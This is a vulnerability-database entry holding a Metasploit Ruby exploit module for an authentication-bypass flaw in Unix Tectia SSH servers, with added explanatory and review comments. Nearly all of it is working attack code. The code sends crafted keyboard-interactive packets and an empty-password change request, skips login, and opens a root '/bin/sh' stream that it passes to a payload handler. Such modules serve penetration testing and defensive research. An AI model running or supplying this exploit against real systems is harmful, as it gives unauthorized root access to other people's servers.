
Tectia SSH USERAUTH Change Request Password Reset Vulnerability

🗓️ 01 Jul 2014 00:00:00 — Reported by RootType

Tectia SSH USERAUTH Change Request Password Reset Vulnerability — on Unix-based platforms, allows a remote user to bypass the login routine and gain access as root.

Code

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	#
	# Module metadata and options.
	#
	# The payload is 'cmd_interact' with a 'find' connection type, so no listener
	# is started: exploit hands the handler the socket of the Net::SSH::CommandStream
	# built in userauth_passwd_change.  USERNAME defaults to 'root'.  SSH_TIMEOUT
	# bounds the whole do_login exchange (see exploit); SSH_DEBUG is registered but
	# not read anywhere in this class.
	#
	def initialize(info={})
		super(update_info(info,
			'Name'           => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability in Tectia SSH server for Unix-based
				platforms.  The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request
				before password authentication, allowing any remote user to bypass the login
				routine, and then gain access as root.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'kingcope',  # Original 0day
					'bperry',
					'sinn3r'
				],
			'References'     =>
				[
					['EDB', '23082'],
					['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Unix-based Tectia SSH 6.3.2.33 or prior', {}],
				],
			'Privileged'     => true,
			'DisclosureDate' => "Dec 01 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(22),
				OptString.new('USERNAME', [true, 'The username to login as', 'root'])
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end

	#
	# Fingerprints the target from its SSH version banner only: connects, reads a
	# single chunk with get_once, prints it and disconnects.
	#
	# Returns Exploit::CheckCode::Appears when the banner matches /SSH Tectia/ and
	# Safe otherwise (a nil banner, i.e. no data received, also fails the match and
	# yields Safe).  The version is not parsed, so a patched Tectia build is
	# reported as Appears too -- a defender cannot take Appears as proof of
	# vulnerability, only of product identity.
	#
	# NOTE(review): connect/get_once errors raised here propagate to the caller;
	# exploit calls check before its begin/rescue block, so they are not rescued
	# there -- confirm that is intended.
	#
	def check
		connect
		banner = sock.get_once
		print_status("#{rhost}:#{rport} - #{banner}")
		disconnect

		return Exploit::CheckCode::Appears if banner =~ /SSH Tectia/
		return Exploit::CheckCode::Safe
	end

	# Target host, read from the datastore; used in every status line and passed
	# to Net::SSH in do_login.
	def rhost
		datastore['RHOST']
	end

	# Target port, read from the datastore (default 22 via Opt::RPORT above).
	def rport
		datastore['RPORT']
	end

	#
	# This is where the login begins.  We're expected to use the keyboard-interactive method to
	# authenticate, but really all we want is skipping it so we can move on to the password
	# method authentication.
	#
	# Message flow (each step is sent on the raw transport, below the Net::SSH
	# authentication layer):
	#   1. USERAUTH_REQUEST (0x32) with method "keyboard-interactive"
	#   2. read two messages (only logged, never inspected)
	#   3. USERAUTH_INFO_RESPONSE (0x3D) with an empty answer
	#   4. read one message (only logged)
	#   5. repeat steps 1-4 twice more (the 2.times loop)
	# Server replies are never branched on, so this method returns nothing
	# meaningful; the result of the exchange only matters to the server state.
	#
	# @param user      [String] username placed in the USERAUTH_REQUEST
	# @param transport [Net::SSH::Transport::Session] negotiated transport
	#
	def auth_keyboard_interactive(user, transport)
		print_status("#{rhost}:#{rport} - Going through keyboard-interactive auth...")
		auth_req_pkt = Net::SSH::Buffer.from(
			:byte, 0x32,                     # SSH_MSG_USERAUTH_REQUEST
			:string, user,                   # username
			:string, "ssh-connection",       # service
			:string, "keyboard-interactive", # method name
			:string, "",                     # language tag
			:string, ""                      # submethods
		)

		# NOTE(review): Net::SSH::Buffer#write appends Integers via to_s, so
		# ':raw, 0x01' most likely emits the ASCII byte "1" rather than a single
		# 0x01 byte -- verify against the Buffer implementation in use.
		user_auth_pkt = Net::SSH::Buffer.from(
			:byte, 0x3D,                     # SSH_MSG_USERAUTH_INFO_RESPONSE
			:raw, 0x01,                      # number of responses (see note above)
			:string, "",                     # empty response
			:raw, "\0"*32                    # padding
		)

		transport.send_message(auth_req_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Authentication to continue: keyboard-interactive")

		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

		# USERAUTH INFO RESPONSE
		transport.send_message(user_auth_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		# Same request/response pair two more times; replies are only logged.
		2.times do |i|
			# USERAUTH REQUEST
			transport.send_message(auth_req_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

			# USERAUTH INFO RESPONSE
			transport.send_message(user_auth_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")
		end
	end


	#
	# The following link is useful to understand how to craft the USERAUTH password change
	# request packet:
	# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
	#
	# Sends a USERAUTH_REQUEST for the "password" method with the change-request
	# boolean set to TRUE and both the old and the new password empty.  Only the
	# type byte of the reply is kept: on SSH_MSG_USERAUTH_SUCCESS (52) a
	# service request for "ssh-userauth" is sent and, on SSH_MSG_SERVICE_ACCEPT (6),
	# a Net::SSH::CommandStream running '/bin/sh' is opened over the connection.
	#
	# @param user       [String] username for the request
	# @param transport  [Net::SSH::Transport::Session] negotiated transport
	# @param connection [Net::SSH::Connection::Session] session the shell is built on
	# @return [Net::SSH::CommandStream, nil] the shell stream on success; nil
	#   (implicit) when either reply type does not match
	#
	def userauth_passwd_change(user, transport, connection)
		print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
		pkt = Net::SSH::Buffer.from(
			:byte, 0x32,               # SSH_MSG_USERAUTH_REQUEST
			:string, user,             # username
			:string, "ssh-connection", # service
			:string, "password"        # method name
		)
		pkt.write_bool(true)           # TRUE = password change request
		pkt.write_string("")           # old password (empty)
		pkt.write_string("")           # new password (empty)

		transport.send_message(pkt)
		message = transport.next_message.type   # type byte only, not the full message
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		if message.to_i == 52 # SSH2_MSG_USERAUTH_SUCCESS
			transport.send_message(transport.service_request("ssh-userauth"))
			message = transport.next_message.type

			if message.to_i == 6 # SSH2_MSG_SERVICE_ACCEPT
				shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
				# Drops only this method's local reference; the caller's variable
				# is untouched (Ruby passes the reference by value).
				connection = nil
				return shell
			end
		end
	end

	#
	# Builds the Net::SSH transport and connection for rhost and runs the two
	# phases above in order.  Options come from Net::SSH::Config.for, i.e. the
	# local client's default ssh_config files for rhost, merged with the user and
	# :record_auth_info => true.
	#
	# @param user [String] username to authenticate as
	# @return whatever userauth_passwd_change returns (CommandStream or nil)
	#
	def do_login(user)
		opts       = {:user=>user, :record_auth_info=>true}
		options    = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)
		transport  = Net::SSH::Transport::Session.new(rhost, options)
		connection = Net::SSH::Connection::Session.new(transport, options)
		auth_keyboard_interactive(user, transport)
		userauth_passwd_change(user, transport, connection)
	end

	#
	# Entry point.  Gates on check (banner must say Tectia), then runs do_login
	# under a Timeout of SSH_TIMEOUT seconds.  Every rescued error returns early;
	# Rex::ConnectionError / Rex::AddressInUse return without printing anything.
	# Net::SSH::Disconnect, EOFError and Timeout::Error all print the same
	# "Timed out during negotiation" line.  If do_login produced a CommandStream,
	# its lsock is handed to the payload handler.
	#
	def exploit
		# Our keyboard-interactive is specific to Tectia.  This allows us to run quicker when we're
		# engaging a variety of SSHD targets on a network.
		if check != Exploit::CheckCode::Appears
			print_error("#{rhost}:#{rport} - Host does not seem vulnerable, will not engage.")
			return
		end

		c = nil

		begin
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				c = do_login(datastore['USERNAME'])
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			# Silent return: no status line is printed for these two.
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		end

		# c is nil unless userauth_passwd_change reached SERVICE_ACCEPT.
		handler(c.lsock) if c
	end
end

                              
